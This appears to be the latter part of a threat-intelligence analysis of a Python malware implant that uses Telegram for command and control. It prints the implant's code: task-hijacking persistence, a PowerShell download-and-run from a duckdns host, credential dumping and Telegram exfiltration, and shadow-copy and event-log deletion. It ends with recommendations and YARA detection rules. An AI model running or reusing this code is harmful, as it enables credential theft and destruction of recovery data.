response = requests.get(url, allow_redirects=True, timeout=20)

with open(file_path, 'wb') as data:
    data.write(response.content)
    
modifier = TaskHijacker('Wscript.exe', '\"C:\\:storm.js\"')
modifier.run_hijacker()
run_command_hidden(f'type {file_path} > C:\\:storm.js')
delete_file(file_path)

This enables execution of the payload through legitimate scheduled tasks rather than attacker-created ones, reducing the visibility of the persistence mechanism. Because the hijacked tasks are pre-existing and typically associated with elevated execution contexts, they provide a covert fallback execution path if more obvious persistence artifacts are identified and removed.

When executed, storm.js launches a PowerShell command that attempts to re-download the original implant from attacker-controlled infrastructure, write it to C:\\Users\\Public\\cyclone.exe, execute it, relaunch ServiceAgent.exe, and start the WindowsAudioSupport service. Since there are already execution controls that prevent duplicate or conflicting instances, this behavior is best assessed as a recovery path rather than a primary delivery mechanism. In practice, the script provides a redundant execution path that can re-establish the implant if it has been removed or is no longer running, while remaining largely inert when it is already active.

powershell.exe Invoke-WebRequest http://windowsupdateshare.duckdns.org/secure/find -Outfile C:\Users\Public\cyclone.exe;
Start-Process -NoNewWindow -FilePath C:\Users\Public\cyclone.exe;
saps C:\Users\Public\Libraries\Libraries\Home\ServiceAgent.exe;
Start-Service -Name WindowsAudioSupport;

Data Collection & Reconnaissance

The routine invokes run_file_search_with_lock(), which creates a .search_lock file under the user’s home .google directory and uses portalocker to prevent concurrent execution of the search and theft workflow. If the lock is acquired, it calls run_weekly_tasks().

def run_file_search_with_lock():
    home_dir = pth.expanduser('~')
    if not os.path.exists(pth.join(home_dir, '.google')):
        os.mkdir(pth.join(home_dir, '.google'))
    lock_file_path = pth.join(home_dir, '.google', '.search_lock')

    with open(lock_file_path, 'w') as f:
        portalocker.lock(f, portalocker.LOCK_EX | portalocker.LOCK_NB)
        run_weekly_tasks()
        portalocker.unlock(f)

‍

run_weekly_tasks() enforces a weekly execution cadence, initializes a search log, performs file discovery as part of ransomware reconnaissance, and executes credential harvesting.

def run_weekly_tasks():
		...
    if should_run_file_search() == True:
        os.makedirs(FILE_SEARCH_DUMMY_FILE_DIR, exist_ok=True)
        init_file_search_log()
        run_ransomware_recon_scan()
        dump_and_exfil_passwords()

run_ransomware_recon_scan() scans accessible drives for files associated with credentials, cryptocurrency wallets, seed phrases, and other sensitive data using keyword and extension-based filtering. It begins by clearing basic event logs, deleting any prior scan log, and initializing a new log file.

clear_basic_event_logs()
delete_file(LOG_FILE_ransQuery)
logging.basicConfig(filename=LOG_FILE_ransQuery, level=logging.INFO, format='%(levelname)s - %(message)s')

It then checks internet connectivity, enumerates accessible drives, collects drive metadata, and scans each drive for files matching a targeted extension set. For each drive, it records label, letter, drive type, and storage utilization, then counts matching file types across the filesystem while skipping selected directories.

drives = enumerate_drives_with_usage()

for drive in drives:
    logging.info(f"Drive: {drive['letter']} | Total: {format_file_size(drive['total'])} | Used: {format_file_size(drive['used'])} | Free: {format_file_size(drive['free'])}")

for drive in drives:
    counter = scan_drive_count_extensions(drive)
    for ext, count in counter.items():
        logging.info(f'{ext}: {count}')

Targeted extensions include documents, spreadsheets, archives, databases, and related file types commonly associated with user data and operational records.

FILE_SEARCH_KEYWORDS = ['cripto', 'perso', 'pin', 'proof', 'Portfolio', 
'phrase', 'seed', 'mnemonic', 'private', 'Kode', 'Code', 'Key', 'Crypto', 
'Coin', 'Btc', 'Auth', '2fa', 'Back', 'Google', 'Asset', 'Wallet', 'confidential', 
'pass', 'monero', 'details', 'login', 'meta', 'master', 'secret']

CRYPTO_FILE_KEYWORDS = ['cripto', 'phrase', 'seed', 'mnemonic', 'private', 
'Kode', 'Code', 'Key', 'Crypto', 'bitcoin', 'Btc', '2fa', 'Wallet', 'pass', 
'luno', 'valr', 'binance', 'exodus', 'monero', 'details', 'login', 'meta', 
'master', 'ether', 'altcoin', 'two', 'factor', 'secret', 'Auth', 'Metamask']

CRYPTO_SEARCH_SKIP_EXTENSIONS = ['.exe', '.dll', '.jar', '.nupkg', 'weleak', 
'.mp3', '.mp4', '.avi', '.mpeg', '.m4a', '.wma', '.msi', '.pst', '.iso', '.flv',
'.img']

After the scan completes, the log is sent to the operator via Telegram and then hidden on disk.

send_ransom_recon_log(LOG_FILE_ransQuery)
hide_path(LOG_FILE_ransQuery)

The malware sends system and domain information to the operator. The send_domain_system_info() function gathers a structured set of host attributes, focusing on domain context. Collected data includes:

• Domain membership statusDetermines whether the host is part of a domain environment
• Domain name and machine roleIdentifies whether the system is a workstation, server, or domain controller
• Disk and storage informationUsed to assess data volume and potential value
• Antivirus statusConfirms effectiveness of prior evasion steps
• NTFS alternate data stream presenceChecks for environments where ADS-based techniques may be viable
• Service state (WindowsAudioSupport)Verifies persistence via the implanted service

This information is formatted and transmitted to the operator via Telegram, providing situational awareness of the compromised host.

After main_payload() completes execution, a completion beacon is sent to the operator via a Telegram bot by posting a message to the primary channel (595967844). The beacon includes the malware version, total execution time, session ID (a randomly generated identifier for the run), and the victim ID.

However, following the completion beacon, the malware continues execution and attempts to identify cryptocurrency wallet applications present on the system. This behavior occurs outside of the main_payload() function and after execution timing has already been recorded, suggesting a possible implementation oversight or misordered logic.

Directories are enumerated within the \\AppData\\Roaming path and compares each directory name against a predefined list of wallet-related keywords. Any matches are collected and exfiltrated to the main operator channel via Telegram. This information is likely used to prioritize targets for cryptocurrency theft or, if access is resold by an initial access broker, to increase the value of the compromised system.

‍

Credential Harvesting

The credential harvesting routine leverages embedded copies of NirSoft utilities WebBrowserPassView and Mail PassView, which are legitimate credential recovery tools commonly repurposed in malicious workflows. These tools are written to disk, executed in silent export mode to extract stored browser and mail credentials, and the results are saved as CSV files.

def dump_and_exfil_passwords():
    webpassview_path = 'C:\\Users\\Public\\Libraries\\Libraries\\Home\\pv.exe'
    mailpassview_path = 'C:\\Users\\Public\\Libraries\\Libraries\\Home\\mv.exe'

    drop_webpassview(webpassview_path)
    drop_mailpassview(mailpassview_path)

    browser_csv_path = os.path.join(
        'C:\\Users\\Public\\Libraries\\Libraries\\Home',
        f'{get_hostname_username()}-browser.csv'
    )
    mail_csv_path = os.path.join(
        'C:\\Users\\Public\\Libraries\\Libraries\\Home',
        f'{get_hostname_username()}-mail.csv'
    )

    run_command_hidden(f'"{webpassview_path}" /scomma "{browser_csv_path}"')
    run_command_hidden(f'"{mailpassview_path}" /scomma "{mail_csv_path}"')

The resulting credential data is exfiltrated to the operator via Telegram, after which both the output files and the credential recovery tools are removed from disk to reduce forensic artifacts.

send_file_to_telegram(browser_csv_path, BOT_TOKEN_PASSWORD_EXFIL, CHAT_ID_FILE_EXFIL, 1)
send_file_to_telegram(mail_csv_path, BOT_TOKEN_PASSWORD_EXFIL, CHAT_ID_FILE_EXFIL, 1)

delete_file(browser_csv_path)
delete_file(mail_csv_path)
delete_file(webpassview_path)
delete_file(mailpassview_path)

‍

Cleanup, Concealment, & Anti-Recovery

The routine modifies Explorer settings, disables MRT again (this time by modifying its registry key), and hides multiple payloads and directories.

run_command_silent('reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v Hidden /t REG_DWORD /d 2 /f')
def disable_mrt():
    mrt_policy_reg_key = 'SOFTWARE\\Policies\\Microsoft\\MRT'
    mrt_disable_value_name = 'DontOfferThroughWUAU'
    reg_value = 1
    reg_handle = winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, mrt_policy_reg_key)
        with reg_handle:
            winreg.SetValueEx(reg_handle, mrt_disable_value_name, 0, winreg.REG_DWORD, reg_value)
        delete_file('C:\\Windows\\System32\\MRT.exe')
disable_mrt()
hide_path('C:\\Users\\Public\\Libraries\\Libraries')
hide_path('C:\\Windows\\sys.js')
hide_path('C:\\Users\\Public\\dormant.exe')
hide_path('C:\\Users\\Public\\find.exe')
hide_path('C:\\Users\\Public\\sshhhhh.exe')
hide_path('C:\\Users\\Public\\cmd.exe')
hide_path('C:\\Users\\Public\\storm.exe')
hide_path('C:\\Users\\Public\\js.js')
hide_path('C:\\Users\\Public\\Libraries\\storm.exe')
hide_path('C:\\Users\\Public\\Libraries\\word.exe')
hide_path('C:\\Users\\Public\\Libraries\\WindowsLogon.exe')
hide_path('C:\\\\Users\\\\Public\\\\storm')

The final phase performs anti-recovery and forensic cleanup. It deletes shadow copies, removes Windows backup data, clears prefetch files, deletes multiple user activity registry artifacts, and clears application, system, PowerShell, and Task Scheduler event logs. This reduces rollback options and limits visibility into execution history, persistence changes, and operator activity.

clear_all_event_logs()
run_command_hidden('cmd /c vssadmin.exe Delete Shadows /All /Quiet')
run_command_hidden('cmd /c wmic shadowcopy delete /nointeractive')
run_command_hidden('cmd /c wbadmin delete backup -keepVersions:0 -quiet')
run_command_hidden('cmd /c del /f /q /s %windir%\\prefetch\\*')

run_command_silent('cmd /c reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" /va /f')
run_command_silent('cmd /c reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist" /va /f')

run_command_hidden('cmd /c wmic nteventlog where LogFileName="Application" Call ClearEventlog')
run_command_hidden('cmd /c wmic nteventlog where LogFileName="System" Call ClearEventlog')
run_command_hidden('cmd /c wmic nteventlog where LogFileName="PowerShell" Call ClearEventlog')

clear_event_log(log_name='Microsoft-Windows-TaskScheduler/Operational')
sleep_jitter(5)
clear_event_log('Microsoft-Windows-TaskScheduler/Operational')
sleep_jitter(600)

‍

Conclusion

Analysis of this sample revealed a multi-purpose Python-based malware responsible for loading multiple malware families while simultaneously conducting ransomware reconnaissance and executing operator commands via a Telegram C2 infrastructure. The malware ensures persistence and defense evasion are successful by employing a wide range of tactics, introducing redundancy in case any mechanisms do not work. Several hardcoded artifacts, including possible developer machine exclusions and embedded tokens, provide detection opportunities and suggest the malware may still be under active development. Regardless of current campaign use, this capability poses a risk to enterprise environments, which are frequently targeted by Initial Access Brokers (IABs) due to the value of their access to other threat actors, inlcuding ransomware groups.

Recommendations

• Monitor for and block unauthorized use of PowerShell commands that modify Windows Defender settings, especially Add-MpPreference and Set-MpPreference.
• Implement application allowlisting to prevent execution of unauthorized binaries from public and user-writable directories.
• Use the provided detection Rules, IOCs and TTPs for detection.
• If Telegram is not used for buisness functions, block outbound connections to api.telegram[.]org.
• Exercise caution when interacting with legal-themed files, especially those originating from unknown, or unexpected, sources.
  • Use sandboxed tools to open unexpected email attachments, even if they appear to come from a known or trusted sender.

‍

YARA Rules

import "pe"
import "hash"

rule Implant_TelegramC2_BotTokens {
    meta:
        description  = "Detects binaries containing operator Telegram bot tokens or chat IDs from this campaign"
        threat_name  = "Python.Implant.TelegramC2.Config"
        mitre_attack = "T1102.002, T1071.001"
        severity     = "critical"

    strings:
        // Known bot tokens (any one is sufficient)
        $bot1  = "7125899405:AAG-08UZQnK_4Z2hGAXwrKyb5tfCFpGw_wo" ascii wide
        $bot2  = "7536158194:AAF52qLWoagF35AXt7Wb5traFCDQnlFdVWw"  ascii wide
        $bot3  = "6315043959:AAFIBSLM1yzjgAacHUHqE5mxG9_p8_QJ_fg"  ascii wide
        $bot4  = "7021684691:AAGvH0Vp9hv_-A45OU0qvCOSQ-PG-v7qv7c"  ascii wide
        $bot5  = "7375374353:AAE7S5ABJnot5I_fAfy0LZeZBZhIc9Miqk4"  ascii wide
        $bot6  = "8462182168:AAEnx9CHMdiqTJuM_eOSJrpbtmDy2EwQj1Q"  ascii wide
        $bot7  = "8450661543:AAEsDlfqCaWgY8RoqKbukaTLCNm2eqM_6h0"  ascii wide
        $bot8  = "7891579424:AAEm5WptzZgeJv1rb4YCytsfIdwyk1I2t18"  ascii wide
        $bot9  = "8391019804:AAFadxF6qo6KYZHvcjBNZbX7EtbiwlWc2Rs"  ascii wide
        $bot10 = "8370559950:AAEH_LAUmZoE3-L6GFz6flz1v51G6lpPHSA"  ascii wide
        $bot11 = "8002191650:AAEeto1p2CYoriTwHjuNH13fl99Bn-FT5PI"  ascii wide
        $bot12 = "7608532773:AAG-X00pGsykZZZS40qJIgCgLuuWxIBEesk"  ascii wide
        $bot13 = "7284129224:AAG8svIQtELHKpOuKQo9Tao8tXxoUSVsQgo"  ascii wide
        $bot14 = "7562788049:AAGndn9OklQCVoBmghU8iVtNrtFwlkYhUQU"  ascii wide
        $bot15 = "7975979817:AAHxQJhXAPBOZ24hjIyBe5jt7DZ4Stz5teI"  ascii wide
        $bot16 = "7677415871:AAG0gQXsNMuY4gPoSDIMw4w0RsBH6Ju56_s"  ascii wide
        $bot17 = "8174280727:AAEvHzvyFfgsB2LYla7DO7Up3ZBzrAsEVO0"  ascii wide

        // Operator chat IDs (combine with bot token for higher confidence)
        $cid1  = "595967844"  ascii wide
        $cid2  = "8558311323" ascii wide
        $cid3  = "5090743280" ascii wide
        $cid4  = "7624487336" ascii wide

        // C2 resolver channel
        $ch1   = "@veryifash"       ascii wide
        $ch2   = "@tgexec1_bot"     ascii wide
        $ch3   = "@tg_exec_2bot"    ascii wide
        $ch4   = "@angel_update"    ascii wide
        $ch5   = "@angel_updatesbot" ascii wide

    condition:
        any of ($bot*) or
        (any of ($cid*) and any of ($ch*))
}


rule Implant_C2_DuckDNS_Domains {
    meta:
        description  = "Detects binaries containing the campaign's DuckDNS C2 domains"
        threat_name  = "Python.Implant.TelegramC2.Network"
        mitre_attack = "T1568.001, T1105"
        severity     = "high"

    strings:
        $d1  = "nanocloudsystem.duckdns.org"       ascii wide nocase
        $d2  = "destroyer56.duckdns.org"            ascii wide nocase
        $d3  = "windowsupdateshare.duckdns.org"     ascii wide nocase
        $d4  = "rootfolder.duckdns.org"             ascii wide nocase
        $d5  = "uploadcommit.duckdns.org"           ascii wide nocase
        $d6  = "cloudsecureshare.duckdns.org"       ascii wide nocase
        $d7  = "safecloudstorage.duckdns.org"       ascii wide nocase
        $d8  = "sleeperhehehe.duckdns.org"          ascii wide nocase
        $d9  = "cloudfortresshost.duckdns.org"      ascii wide nocase
        $d10 = "cloudshieldnetwork.duckdns.org"     ascii wide nocase
        $d11 = "securecloudaccess.duckdns.org"      ascii wide nocase
        $d12 = "cloudguardservice.duckdns.org"      ascii wide nocase
        $d13 = "marianna.hopto.org"                 ascii wide nocase

        // Payload paths
        $p1  = "/secure/LaunchExec" ascii wide
        $p2  = "/secure/ssshhhh"    ascii wide
        $p3  = "/secure/killer"     ascii wide
        $p4  = "/secure/WindowSvc"  ascii wide
        $p5  = "/secure/winfuck"    ascii wide
        $p6  = "/secure/WindowMain" ascii wide
        $p7  = "/secure/find"       ascii wide
        $p8  = "/secure/dormant"    ascii wide
        $p9  = "/secure/backup"     ascii wide
        $p10 = "/secure/rem"        ascii wide
        $p11 = "/secure/Qu"         ascii wide

    condition:
        2 of ($d*) or
        (any of ($d*) and any of ($p*))
}


rule Implant_StagingPaths_ProcessNames {
    meta:
        description  = "Detects hardcoded staging paths and process name sets used by the implant"
        threat_name  = "Python.Implant.TelegramC2.Staging"
        mitre_attack = "T1036.005, T1074.001"
        severity     = "high"

    strings:
        // Staging paths
        $path1  = "C:\\\\Users\\\\Public\\\\Libraries\\\\Libraries" ascii wide
        $path2  = "C:\\\\Users\\\\Public\\\\sshhhhh.exe"          ascii wide
        $path3  = "C:\\\\Users\\\\Public\\\\tornado.exe"          ascii wide
        $path4  = "C:\\\\Users\\\\Public\\\\dormant.exe"          ascii wide
        $path5  = "C:\\\\Users\\\\Public\\\\Libraries\\\\Libraries\\\\Home\\\\SecureSystem.exe"    ascii wide
        $path6  = "C:\\\\Users\\\\Public\\\\Libraries\\\\Libraries\\\\Home\\\\ServiceAgent.exe"   ascii wide
        $path7  = "C:\\\\Users\\\\Public\\\\Libraries\\\\Libraries\\\\Folder\\\\MicrosoftCopilot.exe" ascii wide
        $path8  = "C:\\\\Users\\\\Public\\\\Libraries\\\\Libraries\\\\Office\\\\MicrosoftAgent.exe"   ascii wide
        $path9  = "C:\\\\Windows\\\\WindowsAudio.exe"           ascii wide

        // Masqueraded filenames
        $proc1 = "WindowsAudioSupport" ascii wide
        $proc2 = "MicrosoftCopilot.exe" ascii wide
        $proc3 = "MicrosoftAgent.exe"  ascii wide
        $proc4 = "ServiceAgent.exe"    ascii wide
        $proc5 = "SecureSystem.exe"    ascii wide
        $proc6 = "TGExec-"             ascii wide
        $proc7 = "CleanExec-"          ascii wide

        // Lock file pattern
        $lock  = ".google" ascii wide

    condition:
        3 of ($path*) or
        (2 of ($proc*) and any of ($path*))
}

// ─────────────────────────────────────────────────────────────────────────────
// Rule 5: Behavioral strings — defense evasion + anti-analysis combo
// ─────────────────────────────────────────────────────────────────────────────
rule Implant_DefenseEvasion_Strings {
    meta:
        description  = "Detects defense evasion string patterns specific to this implant"
        threat_name  = "Python.Implant.TelegramC2.Evasion"
        mitre_attack = "T1562.001, T1112, T1197"
        severity     = "high"

    strings:
        // Defender bypass commands
        $ev1 = "Add-MpPreference -ExclusionPath 'C:\\\\Users'" ascii wide nocase
        $ev2 = "Set-MpPreference -DisableBehaviorMonitoring $true" ascii wide nocase
        $ev3 = "Set-MpPreference -SubmitSamplesConsent 0"          ascii wide nocase
        $ev4 = "Add-MpPreference -ExclusionExtension" ascii wide nocase
        $ev5 = "ScanScheduleDay 8" ascii wide nocase

        // IFEO stack rumbling
        $ev6 = "MinimumStackCommitInBytes" ascii wide
        $ev7 = "256256256" ascii wide

        // Defender notification suppression
        $ev8 = "Windows.Defender.SecurityCenter" ascii wide

        // MRT disabling
        $ev9 = "DontOfferThroughWUAU" ascii wide

        // VSS + forensic cleanup
        $ev10 = "vssadmin.exe Delete Shadows /All /Quiet" ascii wide nocase
        $ev11 = "wbadmin delete backup -keepVersions:0"   ascii wide nocase
        $ev12 = "del %windir%\\\\prefetch\\\\*"               ascii wide nocase

        // EDR silencer invocation
        $ev13 = "blockedr" ascii wide
        $ev14 = "sshhhhh.exe" ascii wide

        // Ransom whitelist
        $ev15 = "pastebin.com/raw/P8AeCKZQ" ascii wide
        $ev16 = "ransom_PC_list" ascii wide

    condition:
        3 of them
}


rule RemcosRAT_Campaign_Config {
    meta:
        description  = "Detects Remcos RAT samples from this campaign via build name and campaign IDs"
        threat_name  = "Remcos.RAT.TelegramC2Campaign"
        sha256_s1    = "c483538b24e8b59156a324c723fcca3a65da94c89a7b826628e12fa97c051edd"
        sha256_s2    = "6b7745e8a0b878ea8fbe5d8b9ad2b09d4f7ce375ae0fa501314fed42c02599a7"
        mitre_attack = "T1219"
        severity     = "critical"

    strings:
        $build    = "B-7-Jun-25-Scr-dog" ascii wide
        $camp1    = "-FCIU3G" ascii wide
        $camp2    = "-T96Y5H" ascii wide
        $mutex1   = "549D12A4C98CD2C9551B622A4DC2CCA2" ascii wide nocase
        $mutex2   = "6C1C7C14D8B7ABFC309E740F22C2109E" ascii wide nocase
        $c2_1     = "sleeperhehehe.duckdns.org" ascii wide nocase
        $c2_2     = "marianna.hopto.org"        ascii wide nocase
        $c2_3     = "cloudfortresshost.duckdns.org" ascii wide nocase
        $c2_4     = "cloudshieldnetwork.duckdns.org" ascii wide nocase
        $c2_5     = "securecloudaccess.duckdns.org"  ascii wide nocase
        $c2_6     = "cloudguardservice.duckdns.org"  ascii wide nocase
   

    condition:
        $build or
        any of ($camp*) or
        any of ($mutex*) or
        any of ($c2_*)
}

‍

‍

‍

‍

‍

‍

‍

‍

‍

‍

‍

‍

‍

‍

‍

‍